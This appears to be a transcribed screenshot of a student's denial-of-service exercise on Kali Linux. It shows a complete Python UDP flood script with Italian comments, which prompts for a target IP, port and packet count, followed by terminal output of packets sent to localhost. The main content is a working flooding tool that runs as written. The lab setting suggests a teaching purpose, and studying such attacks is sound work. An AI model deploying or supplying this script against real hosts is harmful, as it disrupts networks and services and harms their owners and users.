

import socket.py 2 x

import socket.py > ...

```
1 import socket
2 import random
3
4 def udp_flood(target_ip, target_port, num_packets):
5     # Creare un socket UDP
6     sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
7
8     # Generare un pacchetto di 1 KB
9     packet_size = 1024 # 1 KB
10    packet = random.randbytes(packet_size)
11
12    # Inviare il numero specificato di pacchetti
13    for i in range(num_packets):
14        sock.sendto(packet, (target_ip, target_port))
15        print(f"Pacchetto {i+1} inviato a {target_ip}:{target_port}")
16
17 if __name__ == "__main__":
18     # Richiedere i dati all'utente
19     target_ip = input("Inserisci l'IP target: ")
20     target_port = int(input("Inserisci la porta target: "))
21     num_packets = int(input("Inserisci il numero di pacchetti da inviare: "))
22
23     # Avviare l'attacco UDP flood
24     udp_flood(target_ip, target_port, num_packets)
```

- StopAsyncIteration
- StopIteration
- SyntaxError
- SyntaxWarning
- SystemError
- SystemExit
- socket
- set
- setattr
- slice
- sorted
- staticmethod

PROBLEMS 2 OUTPUT DEBUG CONSOLE TERMINAL PORTS

```
Pacchetto 86 inviato a 127.0.0.1:8080
Pacchetto 87 inviato a 127.0.0.1:8080
Pacchetto 88 inviato a 127.0.0.1:8080
Pacchetto 89 inviato a 127.0.0.1:8080
Pacchetto 90 inviato a 127.0.0.1:8080
Pacchetto 91 inviato a 127.0.0.1:8080
Pacchetto 92 inviato a 127.0.0.1:8080
Pacchetto 93 inviato a 127.0.0.1:8080
Pacchetto 94 inviato a 127.0.0.1:8080
Pacchetto 95 inviato a 127.0.0.1:8080
Pacchetto 96 inviato a 127.0.0.1:8080
Pacchetto 97 inviato a 127.0.0.1:8080
Pacchetto 98 inviato a 127.0.0.1:8080
Pacchetto 99 inviato a 127.0.0.1:8080
Pacchetto 100 inviato a 127.0.0.1:8080
```

```
(kali@kali) - [~/Desktop/S3L5 - DOS ATTACK]
```

[illegible]